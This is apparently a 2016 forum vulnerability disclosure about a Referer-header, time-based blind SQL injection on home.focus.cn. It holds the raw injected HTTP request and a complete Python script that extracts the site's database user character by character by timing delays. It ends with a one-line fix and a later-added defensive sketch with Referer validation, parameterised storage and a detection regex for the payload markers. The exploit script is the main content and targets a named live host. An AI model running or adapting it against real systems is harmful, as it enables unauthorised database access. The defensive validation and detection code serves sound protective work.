HanDs

[July disclosure] A Referer-header SQL injection on Sohu Focus (verification script attached)






Details:

1. Request headers:

Code:
GET /decorstuffview/654294.html HTTP/1.1
Referer: if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
X-Requested-With: XMLHttpRequest
Host: home.focus.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*

2. The length of user() was determined to be 20 characters.

[Three screenshots of the timing tests, taken 2016-05-24, not reproduced here]

Proof of vulnerability:

Code:
import requests
import time

# Candidate characters for each position of user(). The original list had 'g'
# twice and no 'j'; corrected here.
payloads = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789@_.'

user = ''

print('Start to retrieve database user:')

# Step 2 established that user() is 20 characters long, so probe positions 1..20.
for i in range(1, 21):
    for payload in payloads:
        # Time-based blind probe carried in the Referer header: the server only
        # sleeps 5 s when the character at position i equals the candidate.
        para = 'if(now()=sysdate(),sleep(0),0)/*\'XOR(if(ascii(substr(user(),%s,1))=%s,sleep(5),0))OR\'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/' % (i, ord(payload))
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21',
            'X-Requested-With': 'XMLHttpRequest',
            'Referer': para,
        }
        start_time = time.time()
        response = requests.get('http://home.focus.cn/decorstuffview/654294.html', headers=headers)
        # A response delayed by about the sleep() duration means the guess was right.
        if time.time() - start_time > 4.9:
            user += payload
            print('\n user is:', user, end='')
            break
        else:
            print('.', end='')

print('\n[Done] database user is %s' % user)

Fix:

Filter the Referer input.
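As an added example (not part of the original post), a Python 3 sketch of what "filter" should mean in practice for this bug: accept the Referer only as an absolute http(s) URL, bind it as a query parameter instead of concatenating it into SQL, and flag the timing-probe pattern from this report when triaging exported log values. The visit table, new_store and record_visit are hypothetical stand-ins, and the sample Referer values are constructed.

```python
import re
import sqlite3
from urllib.parse import urlsplit

# Markers of the payload family in this report: MySQL timing functions plus the
# quote-breaking XOR wrapper. Used for log triage; URL validation is the real gate.
SQLI_MARKERS = re.compile(
    r"sleep\s*\(|benchmark\s*\(|sysdate\s*\(|now\s*\(\s*\)\s*=|xor\s*\(", re.I)

def is_plausible_referer(value):
    """True for an absent Referer ('' or '-') or an absolute http(s) URL with no markers."""
    if value in ("", "-"):
        return True
    parts = urlsplit(value)
    return (parts.scheme in ("http", "https") and bool(parts.netloc)
            and not SQLI_MARKERS.search(value))

def flag_suspicious_referers(referers):
    """Indexes of Referer values that a log triage pass should surface for review."""
    return [i for i, r in enumerate(referers) if not is_plausible_referer(r)]

def new_store():
    """In-memory stand-in for the visit table (hypothetical schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE visits(path TEXT, referer TEXT)")
    return conn

def record_visit(conn, path, referer):
    """Store the visit with the Referer bound as a parameter; returns the stored value."""
    stored = referer if is_plausible_referer(referer) and referer not in ("", "-") else None
    conn.execute("INSERT INTO visits(path, referer) VALUES (?, ?)", (path, stored))
    return stored

# Constructed sample: Referer values as exported from an access log; the second
# is the probe string from this report (a timing probe that returns no data).
SAMPLE_REFERERS = [
    "http://home.focus.cn/",
    "if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'\"XOR(if(now()=sysdate(),sleep(0),0))OR\"*/",
    "-",
]

if __name__ == "__main__":
    conn = new_store()
    print("flagged indexes:", flag_suspicious_referers(SAMPLE_REFERERS))
    for r in SAMPLE_REFERERS:
        record_visit(conn, "/decorstuffview/654294.html", r)
    print(conn.execute("SELECT count(*) FROM visits").fetchone()[0], "rows stored")
```

A rejected Referer is dropped rather than failing the request, since the header is optional and untrusted either way.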


#1 | Posted: 2016-7-9 | Views: 0 | Replies: 0